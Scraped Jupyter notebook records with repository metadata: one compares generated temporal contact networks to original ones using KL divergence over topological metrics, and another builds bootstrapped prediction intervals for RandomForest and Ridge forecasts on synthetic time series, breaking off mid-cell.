"Predicted 7 for this image: \n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb4fd750ea3dea41ec1c01040e18d73721164945 | 104,839 | ipynb | Jupyter Notebook | Evaluation/Topology-multiple_run-KL.ipynb | AntonioLonga/ETNgen | 0a9a2f330e24006c7c9c6acef89297db991e0b64 | [
"MIT"
] | 1 | 2022-02-18T14:35:28.000Z | 2022-02-18T14:35:28.000Z | Evaluation/Topology-multiple_run-KL.ipynb | AntonioLonga/ETNgen | 0a9a2f330e24006c7c9c6acef89297db991e0b64 | [
"MIT"
] | null | null | null | Evaluation/Topology-multiple_run-KL.ipynb | AntonioLonga/ETNgen | 0a9a2f330e24006c7c9c6acef89297db991e0b64 | [
"MIT"
] | null | null | null | 130.073201 | 78,484 | 0.851925 | [
[
[
"import construction as cs\nimport matplotlib.pyplot as plt\n\n### read font\nfrom matplotlib import font_manager\n\nfont_dirs = ['Barlow/']\nfont_files = font_manager.findSystemFonts(fontpaths=font_dirs)\n\nfor font_file in font_files:\n font_manager.fontManager.addfont(font_file)\n\n# set font\nplt.rcParams['font.family'] = 'Barlow'\n\nimport networkx as nx\n%matplotlib inline\n%config InlineBackend.figure_format = 'retina'\n\n%load_ext autoreload\n%autoreload 2",
"_____no_output_____"
]
],
[
[
"# Load generated graphs",
"_____no_output_____"
]
],
[
[
"def load_origin_graph(file_name,gap=299):\n data_in = cs.load_data(\"../Datasets/\"+file_name+\".dat\")\n gap = 299 \n graphs_in = cs.build_graphs(data_in,gap=gap)\n return graphs_in\n\ndef load_ETNgen_graph(file_name):\n path = \"../Generated_graphs/Multiple_run/\"+file_name+\"/\"\n gap = 299 \n graphs = []\n for i in os.listdir(path):\n data_in = cs.load_data(path+i)\n graphs_in = cs.build_graphs(data_in,gap=gap)\n graphs.append(graphs_in)\n return graphs\n\n\ndef load_dym_graph(file_name):\n path = \"../Competitors_generated_graphs/Dymond/Multiple_run/\"+file_name+\"/\"\n gap = 0 \n graphs = []\n for i in os.listdir(path):\n print(path+i)\n data_in = cs.load_data(path+i)\n graphs_in = cs.build_graphs(data_in,gap=gap)\n graphs.append(graphs_in)\n return graphs\n\ndef load_stm_graph(file_name):\n path = \"../Competitors_generated_graphs/STM/Multiple_run/\"+file_name+\"/\"\n gap = 0 \n graphs = []\n for i in os.listdir(path):\n print(path+i)\n data_in = cs.load_data(path+i)\n graphs_in = cs.build_graphs(data_in,gap=gap)\n graphs.append(graphs_in)\n return graphs\n\ndef load_tag_graph(file_name):\n path = \"../Competitors_generated_graphs/TagGen/Multiple_run/\"+file_name+\"/\"\n gap = 0 \n graphs = []\n for i in os.listdir(path):\n print(path+i)\n data_in = cs.load_data(path+i)\n graphs_in = cs.build_graphs(data_in,gap=gap)\n graphs.append(graphs_in)\n return graphs",
"_____no_output_____"
],
[
"import networkx as nx\nimport numpy as np\nfrom scipy import stats\nimport matplotlib.pyplot as plt\n\nfrom topological_metrics import *\n\nimport os",
"_____no_output_____"
]
],
[
[
"# Compute and store topological distributions",
"_____no_output_____"
]
],
[
[
"file_name = \"High_School11\"\norig_graphs = load_origin_graph(file_name,gap=299)\netn_gen = load_ETNgen_graph(file_name)\ndym_gen = load_dym_graph(file_name)\ntag_gen = load_tag_graph(file_name)\nstm_gen = load_stm_graph(file_name)",
"_____no_output_____"
],
[
"def comp_metric(graphs,metric):\n metric_dist = []\n for graph in graphs:\n metric_dist.append(metric(graph))\n return metric_dist\n\ndef compute_store_metrics(metrics,metrics_names,generator,file_name,graphs):\n for i in range(len(metrics)):\n metric = metrics[i]\n metric_name = metrics_names[i]\n met = comp_metric(graphs,metric)\n np.save(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/\"+metric_name,met)\n \ndef compute_store_metrics_original(metrics,metrics_names,file_name,graphs):\n for i in range(len(metrics)):\n metric = metrics[i]\n metric_name = metrics_names[i]\n met = comp_metric([graphs],metric)\n np.save(\"topology_results/original_distributions/\"+file_name+\"/\"+metric_name,met)\n ",
"_____no_output_____"
],
[
"metrics = [density,global_clustering,average_shortest_path,dist_number_of_individuals,\n dist_number_of_new_conversations,get_ass,s_metric,dist_frequency_of_interactions,\n dist_strength_of_nodes,dist_duration]\nmetrics_names = [\"density\",\"clust\",\"asp\",\"nb_interactions\",\n \"new_con\",\"ass\",\"s_metric\",\"interacting_indiv\",\n \"streng\",\"dur\"]",
"_____no_output_____"
],
[
"compute_store_metrics_original(metrics,metrics_names,file_name,orig_graphs)",
"_____no_output_____"
],
[
"compute_store_metrics(metrics,metrics_names,\n \"etngen\",\n file_name,\n etn_gen)",
"_____no_output_____"
],
[
"compute_store_metrics(metrics,metrics_names,\n \"taggen\",\n file_name,\n tag_gen)\ncompute_store_metrics(metrics,metrics_names,\n \"stmgen\",\n file_name,\n stm_gen)\ncompute_store_metrics(metrics,metrics_names,\n \"dymgen\",\n file_name,\n dym_gen)",
"_____no_output_____"
]
],
[
[
"# load distributions",
"_____no_output_____"
]
],
[
[
"labels",
"_____no_output_____"
],
[
"def load_topo_distributions(generator,file_name):\n \n den = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/density.npy\",allow_pickle=True)\n clust = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/clust.npy\",allow_pickle=True)\n asp = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/asp.npy\",allow_pickle=True)\n nb_inter = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/nb_interactions.npy\",allow_pickle=True)\n new_conv = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/new_con.npy\",allow_pickle=True)\n ass = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/ass.npy\",allow_pickle=True)\n s_met = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/s_metric.npy\",allow_pickle=True)\n inter_indiv = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/interacting_indiv.npy\",allow_pickle=True)\n stren = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/streng.npy\",allow_pickle=True)\n durat = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/dur.npy\",allow_pickle=True)\n \n return asp,ass,clust,stren,durat,s_met,new_conv,inter_indiv,den,nb_inter\n\ndef load_topo_original(file_name):\n den = np.load(\"topology_results/original_distributions/\"+file_name+\"/density.npy\",allow_pickle=True)\n clust = np.load(\"topology_results/original_distributions/\"+file_name+\"/clust.npy\",allow_pickle=True)\n asp = np.load(\"topology_results/original_distributions/\"+file_name+\"/asp.npy\",allow_pickle=True)\n nb_inter = np.load(\"topology_results/original_distributions/\"+file_name+\"/nb_interactions.npy\",allow_pickle=True)\n new_conv = np.load(\"topology_results/original_distributions/\"+file_name+\"/new_con.npy\",allow_pickle=True)\n ass = np.load(\"topology_results/original_distributions/\"+file_name+\"/ass.npy\",allow_pickle=True)\n s_met = np.load(\"topology_results/original_distributions/\"+file_name+\"/s_metric.npy\",allow_pickle=True)\n inter_indiv = np.load(\"topology_results/original_distributions/\"+file_name+\"/interacting_indiv.npy\",allow_pickle=True)\n stren = np.load(\"topology_results/original_distributions/\"+file_name+\"/streng.npy\",allow_pickle=True)\n durat = np.load(\"topology_results/original_distributions/\"+file_name+\"/dur.npy\",allow_pickle=True)\n \n return asp,ass,clust,stren,durat,s_met,new_conv,inter_indiv,den,nb_inter\n\n\ndef compute_counts(ro,e):\n counts = []\n e = np.array(e)\n for i in range(len(ro)-1):\n r1 = ro[i]\n r2 = ro[i+1]\n ee = e[e>r1]\n count = ee[ee<=r2]\n counts.append(len(count))\n return counts\n\ndef compute_multpile_counts(ranges,ee):\n counts = []\n for e in ee:\n counts.append(compute_counts(ranges,e))\n return counts\n\n# example of calculating the kl divergence between two mass functions\nfrom math import log2\n \n# calculate the kl divergence\ndef kl_divergence_max(d2, d1):\n \n max_len = max(len(d1),len(d2))\n\n new_d1 = np.zeros(max_len)\n new_d1[:len(d1)] = d1\n\n new_d2 = np.zeros(max_len)\n new_d2[:len(d2)] = d2\n \n E = 0.0000001\n new_d1 = new_d1 + E\n new_d2 = new_d2 + E\n\n res = 0\n for i in range(max_len):\n d1 = new_d1[i]\n d2 = new_d2[i]\n \n if (d1 != 0) and (d2 != 0):\n res = res + (d1 * log2(d1/d2))\n \n return res",
"_____no_output_____"
]
],
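A quick usage note for `kl_divergence_max` defined above: its arguments are `(d2, d1)` and it accumulates `d1 * log2(d1 / d2)`, i.e. the KL divergence of `d1` from `d2`; the shorter input is zero-padded and a small epsilon is added to avoid division by zero. A hedged illustration with made-up values:

```python
q_generated = [0.5, 0.3, 0.2]       # e.g. a binned distribution from a generated graph
p_original = [0.4, 0.4, 0.1, 0.1]   # e.g. the original distribution (lengths may differ)

# D_KL(p_original || q_generated), matching the later calls kl_divergence_max(generated, original)
print(kl_divergence_max(q_generated, p_original))
```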
[
[
"density = tag\nclust = orig\nasp = tag\nnb_inter = tag\nnew_conv = tag\nass = ori\ns_met = tag\ninter_indiv = tag\nstren = tag\ndur = tag",
"_____no_output_____"
]
],
[
[
"def compute_ks_all_metrics(nb_bins,file_name):\n res_etn = []\n res_tag = []\n res_stm = []\n res_dym = []\n o_in = load_topo_original(file_name)\n e_in = load_topo_distributions(\"etngen\",file_name)\n t_in = load_topo_distributions(\"taggen\",file_name)\n d_in = load_topo_distributions(\"dymgen\",file_name)\n s_in = load_topo_distributions(\"stmgen\",file_name)\n\n all_res = []\n for i in range(10):\n\n o = o_in[i]\n e = e_in[i]\n t = t_in[i]\n d = d_in[i]\n s = s_in[i]\n\n #if i == 1 or i == 5 or i == 6:\n biggest_dist = o[0]\n #else:\n #biggest_dist = np.max(t)\n\n tc,tranges = np.histogram(biggest_dist,bins=nb_bins)\n\n oc = compute_counts(tranges,o)\n ec = compute_multpile_counts(tranges,e)\n dc = compute_multpile_counts(tranges,d)\n tc = compute_multpile_counts(tranges,t)\n sc = compute_multpile_counts(tranges,s)\n\n\n oc = oc/np.sum(oc)\n ec = [np.array(x)/sum(x) for x in ec]\n dc = [np.array(x)/sum(x) for x in dc]\n tc = [np.array(x)/sum(x) for x in tc]\n sc = [np.array(x)/sum(x) for x in sc]\n\n\n\n ec_kl = []\n tc_kl = []\n sc_kl = []\n dc_kl = []\n for i in ec:\n ec_kl.append(kl_divergence_max(i,oc))\n for i in tc:\n tc_kl.append(kl_divergence_max(i,oc))\n for i in dc:\n dc_kl.append(kl_divergence_max(i,oc))\n for i in sc:\n sc_kl.append(kl_divergence_max(i,oc))\n\n\n maximum_for_nome = max(np.nanmax(ec_kl),np.nanmax(tc_kl),np.nanmax(sc_kl),np.nanmax(dc_kl))\n ec_kl = ec_kl/maximum_for_nome\n tc_kl = tc_kl/maximum_for_nome\n sc_kl = sc_kl/maximum_for_nome\n dc_kl = dc_kl/maximum_for_nome\n\n res = [[np.nanmean(ec_kl),np.nanstd(ec_kl)],[np.nanmean(tc_kl),np.nanstd(tc_kl)],\n [np.nanmean(sc_kl),np.nanstd(sc_kl)],[np.nanmean(dc_kl),np.nanstd(dc_kl)]]\n \n res_etn.append([np.nanmean(ec_kl),np.nanstd(ec_kl)])\n res_tag.append([np.nanmean(tc_kl),np.nanstd(tc_kl)])\n res_stm.append([np.nanmean(sc_kl),np.nanstd(sc_kl)])\n res_dym.append([np.nanmean(dc_kl),np.nanstd(dc_kl)])\n\n if False:\n plt.figure(figsize=(15,5))\n plt.subplot(1,5,1)\n plt.bar(range(nb_bins),oc)\n plt.title(\"orig\")\n plt.subplot(1,5,2)\n plt.bar(range(nb_bins),ec[0])\n plt.title(\"etn\\n\"+str(res[0])[0:5])\n plt.subplot(1,5,3)\n plt.bar(range(nb_bins),tc[0])\n plt.title(\"tag\\n\"+str(res[1])[0:5])\n plt.subplot(1,5,4)\n plt.bar(range(nb_bins),sc[0])\n plt.title(\"stm\\n\"+str(res[2])[0:5])\n plt.subplot(1,5,5)\n plt.bar(range(nb_bins),dc[0])\n plt.title(\"diam\\n\"+str(res[3])[0:5])\n plt.show()\n\n #res2 = []\n\n #ooo = o[0]/np.sum(o[0])\n #eee = e[0]/np.sum(e[0])\n #ttt = t[0]/np.sum(t[0])\n #sss = s[0]/np.sum(s[0])\n #ddd = d[0]/np.sum(d[0])\n\n #res2.append(kl_divergence_max(ooo,eee))\n #res2.append(kl_divergence_max(ooo,ttt))\n #res2.append(kl_divergence_max(ooo,sss))\n #res2.append(kl_divergence_max(ooo,ddd))\n #if False:\n # plt.figure(figsize=(15,5))\n # plt.subplot(1,5,1)\n # plt.hist(o[0],bins=10)\n # plt.title(\"orig\")\n # plt.subplot(1,5,2)\n # plt.hist(e[0],bins=10)\n # plt.title(\"etn\\n\"+str(res2[0])[0:5])\n # plt.subplot(1,5,3)\n # plt.hist(t[0],bins=10)\n # plt.title(\"tag\\n\"+str(res2[1])[0:5])\n # plt.subplot(1,5,4)\n # plt.hist(s[0],bins=10)\n # plt.title(\"stm\\n\"+str(res2[2])[0:5])\n # plt.subplot(1,5,5)\n # plt.hist(d[0],bins=10)\n # plt.title(\"diam\\n\"+str(res2[3])[0:5])\n # plt.show()\n\n return [np.array(res_etn),np.array(res_tag),np.array(res_stm),np.array(res_dym)]",
"_____no_output_____"
],
[
"\n\nORIGINAL_COLOR = '#474747' #dark grey\nETN_COLOR = '#fb7041' #'#E5865E' # arancio\nTAG_COLOR = '#96ccc8' # light blue\nSTM_COLOR = '#bad1f2' #8F2E27' # rosso\nDYM_COLOR = '#559ca6' # teal\n\n\nline_width = 1.5",
"_____no_output_____"
],
[
"idx =[2, 5, 1, 8, 9, 6, 4, 3, 0, 7]\ntmp= [\"Density\",\n \"Global clustering \\ncoefficient\",\n \"Average shortest\\npath length\",\n \"Interacting\\nindividuals\",\n \"New conversations\",\n \"Assortativity\",\n \"S-metric\", \n \"Number of interactions\",\n \"Edge strength\",\n \"Duration of contacts\"]\n\ntmp = np.array(tmp)",
"_____no_output_____"
],
[
"labels = tmp[idx]",
"_____no_output_____"
],
[
"import matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nnb_bins = 50\n\n\nx1,x2,x3,x4 = compute_ks_all_metrics(nb_bins,\"LH10\")\n\n\nx = np.arange(10) # the label locations\nwidth = 0.2 # the width of the bars\n\n\nfig, ax = plt.subplots(1,3,figsize=(12,10))\nfig.tight_layout(pad=-4)\n\n\nerror_bar_style = dict(ecolor=ORIGINAL_COLOR, alpha=0.8, lw=1.5, capsize=3, capthick=1)\n\nax[0].title.set_text(\"Hospital\")\nrects1 = ax[0].barh(x + 0.3, x1[:,0], width, xerr=x1[:,1],label='ETN-gen',color=ETN_COLOR, error_kw=error_bar_style)\nrects2 = ax[0].barh(x + 0.1, x2[:,0], width, xerr=x2[:,1],label='STM',color=STM_COLOR, error_kw=error_bar_style)\nrects3 = ax[0].barh(x - 0.1, x3[:,0], width, xerr=x3[:,1],label='TagGen',color=TAG_COLOR, error_kw=error_bar_style)\nrects4 = ax[0].barh(x - 0.3, x4[:,0], width, xerr=x4[:,1],label='Dymond',color=DYM_COLOR,error_kw=error_bar_style)\n\n\n\nx1,x2,x3,x4 = compute_ks_all_metrics(nb_bins,\"InVS13\")\nax[1].title.set_text(\"Workplace\")\n\nrects1 = ax[1].barh(x + 0.3, x1[:,0], width, xerr=x1[:,1],label='ETN-gen',color=ETN_COLOR, error_kw=error_bar_style)\nrects2 = ax[1].barh(x + 0.1, x2[:,0], width, xerr=x2[:,1],label='STM',color=STM_COLOR, error_kw=error_bar_style)\nrects3 = ax[1].barh(x - 0.1, x3[:,0], width, xerr=x3[:,1],label='TagGen',color=TAG_COLOR, error_kw=error_bar_style)\nrects4 = ax[1].barh(x - 0.3, x4[:,0], width, xerr=x4[:,1],label='Dymond',color=DYM_COLOR,error_kw=error_bar_style)\n\n\nx1,x2,x3,x4 = compute_ks_all_metrics(nb_bins,\"High_School11\")\nax[2].title.set_text(\"High school\")\nrects1 = ax[2].barh(x + 0.3, x1[:,0], width, xerr=x1[:,1],label='ETN-gen',color=ETN_COLOR, error_kw=error_bar_style)\nrects2 = ax[2].barh(x + 0.1, x2[:,0], width, xerr=x2[:,1],label='STM',color=STM_COLOR, error_kw=error_bar_style)\nrects3 = ax[2].barh(x - 0.1, x3[:,0], width, xerr=x3[:,1],label='TagGen',color=TAG_COLOR, error_kw=error_bar_style)\nrects4 = ax[2].barh(x - 0.3, x4[:,0], width, xerr=x4[:,1],label='Dymond',color=DYM_COLOR,error_kw=error_bar_style)\n\n\nax[0].set_yticklabels(labels)\nax[0].set_yticks(x)\nax[0].set_xlim(0,1)\n\nax[1].set_yticks(x)\nax[1].set_yticklabels([\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \"],rotation=0)\nax[1].set_xlim(0,1)\n\nax[2].set_yticks(x)\nax[2].set_xlim(0,1)\nax[2].set_yticklabels([\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \"],rotation=0)\n\nax[2].set_xticks([0,0.33,0.66,1])\nax[2].set_xticklabels([\"0.0\",\"0.33\",\"0.66\",\"1.0\"])\nax[1].set_xticks([0,0.33,0.66,1])\nax[1].set_xticklabels([\"0.0\",\"0.33\",\"0.66\",\"1.0\"])\nax[0].set_xticks([0,0.33,0.66,1])\nax[0].set_xticklabels([\"0.0\",\"0.33\",\"0.66\",\"1.0\"])\n\n\nax[0].tick_params(bottom=True, right=False,left=False)\nax[0].set_axisbelow(True)\nax[0].xaxis.grid(True, color='#b3b3b3')\nax[0].yaxis.grid(False)\n\nax[1].tick_params(bottom=True, right=False,left=False)\nax[1].set_axisbelow(True)\nax[1].xaxis.grid(True, color='#b3b3b3')\nax[1].yaxis.grid(False)\n\nax[2].tick_params(bottom=True, right=False,left=False)\nax[2].set_axisbelow(True)\nax[2].xaxis.grid(True, 
color='#b3b3b3')\nax[2].yaxis.grid(False)\n\n\n\nax[0].spines['top'].set_visible(False)\nax[0].spines['right'].set_visible(False)\nax[0].spines['left'].set_visible(False)\nax[0].spines['bottom'].set_visible(False)\n\n\n\nax[1].spines['top'].set_visible(False)\nax[1].spines['right'].set_visible(False)\nax[1].spines['left'].set_visible(False)\nax[1].spines['bottom'].set_visible(False)\n\n\nax[2].spines['top'].set_visible(False)\nax[2].spines['right'].set_visible(False)\nax[2].spines['left'].set_visible(False)\nax[2].spines['bottom'].set_visible(False)\n\n\nax[0].legend(loc='upper right',ncol = 5,bbox_to_anchor=(1, -0.05))\n\nfig.tight_layout()\nplt.savefig(\"topology_main_kld_test1.pdf\", bbox_inches = 'tight')\nplt.show()",
"<ipython-input-109-b439b330c2a3>:37: RuntimeWarning: invalid value encountered in true_divide\n dc = [np.array(x)/sum(x) for x in dc]\n<ipython-input-116-34fe7df1eebd>:45: UserWarning: FixedFormatter should only be used together with FixedLocator\n ax[0].set_yticklabels(labels)\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"raw",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"raw"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb4fd8110a35f430d4958036f17350c37b728a43 | 245,049 | ipynb | Jupyter Notebook | notebooks/train_raw_gan.ipynb | mrquincle/latent_3d_points | 97440587485c28442f79bc98b474e5d9852efa52 | [
"MIT"
] | 1 | 2021-03-19T17:20:58.000Z | 2021-03-19T17:20:58.000Z | notebooks/train_raw_gan.ipynb | mrquincle/latent_3d_points | 97440587485c28442f79bc98b474e5d9852efa52 | [
"MIT"
] | null | null | null | notebooks/train_raw_gan.ipynb | mrquincle/latent_3d_points | 97440587485c28442f79bc98b474e5d9852efa52 | [
"MIT"
] | 1 | 2019-02-11T15:15:58.000Z | 2019-02-11T15:15:58.000Z | 671.367123 | 40,826 | 0.939681 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
cb4fd91d115f7c1475ad94b035ae2a86972073f8 | 651,058 | ipynb | Jupyter Notebook | Prediction_Intervals/Prediction_Intervals.ipynb | MugiPham/MEDIUM_NoteBook | 799b146469c99d8a94ab8684beb78271eec73cfb | [
"MIT"
] | 1 | 2022-03-02T14:31:08.000Z | 2022-03-02T14:31:08.000Z | Prediction_Intervals/Prediction_Intervals.ipynb | MugiPham/MEDIUM_NoteBook | 799b146469c99d8a94ab8684beb78271eec73cfb | [
"MIT"
] | null | null | null | Prediction_Intervals/Prediction_Intervals.ipynb | MugiPham/MEDIUM_NoteBook | 799b146469c99d8a94ab8684beb78271eec73cfb | [
"MIT"
] | null | null | null | 607.897292 | 119,796 | 0.947317 | [
[
[
"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom sklearn.ensemble import *\nfrom sklearn.linear_model import *\nfrom sklearn.model_selection import train_test_split, GridSearchCV, cross_val_predict",
"_____no_output_____"
],
[
"### UTILITY FUNCTION FOR DATA GENERATION ###\n\ndef gen_sinusoidal(timesteps, amp, freq, noise):\n \n X = np.arange(timesteps)\n e = np.random.normal(0,noise, (timesteps,))\n y = amp*np.sin(X*(2*np.pi/freq))+e\n \n return y\n\n\ndef gen_randomwalk(timesteps, noise):\n\n y = np.random.normal(0,noise, (timesteps,))\n \n return y.cumsum()",
"_____no_output_____"
],
[
"### CREATE SYNTHETIC DATA ###\n\nnp.random.seed(0)\n\ntimesteps = 1000\n\ndata1 = gen_sinusoidal(timesteps=timesteps, amp=10, freq=24, noise=5)\ndata2 = gen_sinusoidal(timesteps=timesteps, amp=10, freq=24*7, noise=5)\ndata3 = gen_randomwalk(timesteps=timesteps, noise=1)",
"_____no_output_____"
]
],
[
[
"# STATIONARY DATA",
"_____no_output_____"
]
],
[
[
"### STORE DATA IN DF ###\n\ndata = data1 + data2\n\ndf = pd.DataFrame({\n 'X1':data1,\n 'X2':data2,\n 'Y':data\n})\n\ndf.index = pd.date_range('2021', periods=timesteps, freq='H')\ncols = df.columns\n\nprint(df.shape)\ndf.head()",
"(1000, 3)\n"
],
[
"### PLOT SYNTHETIC DATA ###\n\nplt.figure(figsize=(16,4))\n\nfor i,c in enumerate(cols[:-1]):\n \n plt.subplot(1,2,i+1)\n df[c].plot(ax=plt.gca(), title=c, color='blue'); plt.xlabel(None)\n\nplt.figure(figsize=(16,4))\ndf['Y'].plot(title='Y', color='red')",
"_____no_output_____"
],
[
"### CREATE ROLLING FEATURES ###\n\nlags = [6, 12, 18, 24]\n\nfor l in lags:\n for c in cols:\n df[f\"{c}_mean_t-{l}\"] = df[c].rolling(l).mean()\n df[f\"{c}_std_t-{l}\"] = df[c].rolling(l).std()\n\ndf['Y'] = df['Y'].shift(-1)\ndf.drop(cols[cols.str.startswith('X')], axis=1, inplace=True)\ndf.dropna(inplace=True)",
"_____no_output_____"
],
[
"### TRAIN TEST SPLIT ###\n\nX_train, X_test, y_train, y_test = train_test_split(\n df.drop('Y', axis=1), df['Y'], \n test_size=24*7*2, shuffle=False)\n\nX_train.shape, X_test.shape",
"_____no_output_____"
],
[
"### RANDOM FOREST TUNING ###\n\nmodel = GridSearchCV(estimator=RandomForestRegressor(random_state=33), \n param_grid={'max_depth': [8, 10, 12, None], 'n_estimators': [20, 30, 40]}, \n scoring='neg_mean_squared_error', cv=3, refit=True)\nmodel.fit(X_train, y_train)\n\nmodel.best_params_",
"_____no_output_____"
],
[
"### OUT-OF-FOLDS RESIDUAL DISTRIBUTION ###\n\npred_train = cross_val_predict(RandomForestRegressor(**model.best_params_, random_state=33), \n X_train, y_train, cv=3)\n\nres = y_train - pred_train",
"_____no_output_____"
],
[
"### PLOT RESIDUAL STATISTICS ###\n\nplt.figure(figsize=(16,5))\n\nplt.subplot(1,2,1)\nplt.title('Residuals Distribution')\nplt.hist(res, bins=20)\n\nplt.subplot(1,2,2)\nplt.title('Residuals Autocorrelation')\nplt.plot([res.autocorr(lag=dt) for dt in range(1,200)])\nplt.ylim([-1,1]); plt.axhline(0, c='black', linestyle='--')\nplt.ylabel('Autocorrelation'); plt.xlabel('Lags')\n\nplt.show()",
"_____no_output_____"
],
[
"### BOOTSTRAPPED INTERVALS ###\n\nalpha = 0.05\n\nbootstrap = np.asarray([np.random.choice(res, size=res.shape) for _ in range(100)])\nq_bootstrap = np.quantile(bootstrap, q=[alpha/2, 1-alpha/2], axis=0)\n\ny_pred = pd.Series(model.predict(X_test), index=X_test.index)\ny_lower = y_pred + q_bootstrap[0].mean()\ny_upper = y_pred + q_bootstrap[1].mean()",
"_____no_output_____"
],
[
"### PLOT BOOTSTRAPPED PREDICTION INTERVALS ###\n\nplt.figure(figsize=(10,6))\n\ny_pred.plot(linewidth=3)\ny_test.plot(style='.k', alpha=0.5)\nplt.fill_between(y_pred.index, y_lower, y_upper, alpha=0.3)\nplt.title('RandomForest test predictions')",
"_____no_output_____"
],
[
"### HOW MANY OUTLIERS IN TEST DATA ###\n\n((y_test > y_upper).sum() + (y_test < y_lower).sum()) / y_test.shape[0]",
"_____no_output_____"
],
[
"### RIDGE TUNING ###\n\nmodel = GridSearchCV(estimator=Ridge(), param_grid={'alpha': [3, 5, 10, 20, 50]}, \n scoring='neg_mean_squared_error', cv=3, refit=True)\nmodel.fit(X_train, y_train)\n\nmodel.best_params_",
"_____no_output_____"
],
[
"### OUT-OF-FOLDS RESIDUAL DISTRIBUTION ###\n\npred_train = cross_val_predict(Ridge(**model.best_params_), X_train, y_train, cv=3)\n\nres = y_train - pred_train",
"_____no_output_____"
],
[
"### PLOT RESIDUAL STATISTICS ###\n\nplt.figure(figsize=(16,5))\n\nplt.subplot(1,2,1)\nplt.title('Residuals Distribution')\nplt.hist(res, bins=20)\n\nplt.subplot(1,2,2)\nplt.title('Residuals Autocorrelation')\nplt.plot([res.autocorr(lag=dt) for dt in range(1,200)])\nplt.ylim([-1,1]); plt.axhline(0, c='black', linestyle='--')\nplt.ylabel('Autocorrelation'); plt.xlabel('Lags')\n\nplt.show()",
"_____no_output_____"
],
[
"### BOOTSTRAPPED INTERVALS ###\n\nalpha = 0.05\n\nbootstrap = np.asarray([np.random.choice(res, size=res.shape) for _ in range(100)])\nq_bootstrap = np.quantile(bootstrap, q=[alpha/2, 1-alpha/2], axis=0)\n\ny_pred = pd.Series(model.predict(X_test), index=X_test.index)\ny_lower = y_pred + q_bootstrap[0].mean()\ny_upper = y_pred + q_bootstrap[1].mean()",
"_____no_output_____"
],
[
"### PLOT BOOTSTRAPPED PREDICTION INTERVALS ###\n\nplt.figure(figsize=(10,6))\n\ny_pred.plot(linewidth=3)\ny_test.plot(style='.k', alpha=0.5)\nplt.fill_between(y_pred.index, y_lower, y_upper, alpha=0.3)\nplt.title('Ridge test predictions')",
"_____no_output_____"
],
[
"### HOW MANY OUTLIERS IN TEST DATA ###\n\n((y_test > y_upper).sum() + (y_test < y_lower).sum()) / y_test.shape[0]",
"_____no_output_____"
]
],
[
[
"# NOT STATIONARY DATA",
"_____no_output_____"
]
],
[
[
"### STORE DATA IN DF ###\n\ndata = data1 + data2 + data3\n\ndf = pd.DataFrame({\n 'X1':data1,\n 'X2':data2,\n 'X3':data3,\n 'Y':data\n})\n\ndf.index = pd.date_range('2021', periods=timesteps, freq='H')\ncols = df.columns\n\nprint(df.shape)\ndf.head()",
"(1000, 4)\n"
],
[
"### PLOT SYNTHETIC DATA ###\n\nplt.figure(figsize=(16,11))\n\nfor i,c in enumerate(cols):\n \n color = 'red' if c == 'Y' else 'blue'\n \n plt.subplot(2,2,i+1)\n df[c].plot(ax=plt.gca(), title=c, color=color); plt.xlabel(None)",
"_____no_output_____"
],
[
"### CREATE ROLLING FEATURES ###\n\nlags = [6, 12, 18, 24]\n\nfor l in lags:\n for c in cols:\n df[f\"{c}_mean_t-{l}\"] = df[c].rolling(l).mean()\n df[f\"{c}_std_t-{l}\"] = df[c].rolling(l).std()\n\ndf['Y'] = df['Y'].shift(-1)\ndf.drop(cols[cols.str.startswith('X')], axis=1, inplace=True)\ndf.dropna(inplace=True)",
"_____no_output_____"
],
[
"### TRAIN TEST SPLIT ###\n\nX_train, X_test, y_train, y_test = train_test_split(\n df.drop('Y', axis=1), df['Y'], \n test_size=24*7*2, shuffle=False)\n\nX_train.shape, X_test.shape",
"_____no_output_____"
],
[
"### RANDOM FOREST TUNING ###\n\nmodel = GridSearchCV(estimator=RandomForestRegressor(random_state=33), \n param_grid={'max_depth': [8, 10, 12, None], 'n_estimators': [20, 30, 40]}, \n scoring='neg_mean_squared_error', cv=3, refit=True)\nmodel.fit(X_train, y_train)\n\nmodel.best_params_",
"_____no_output_____"
],
[
"### OUT-OF-FOLDS RESIDUAL DISTRIBUTION ###\n\npred_train = cross_val_predict(RandomForestRegressor(**model.best_params_, random_state=33), \n X_train, y_train, cv=3)\n\nres = y_train - pred_train",
"_____no_output_____"
],
[
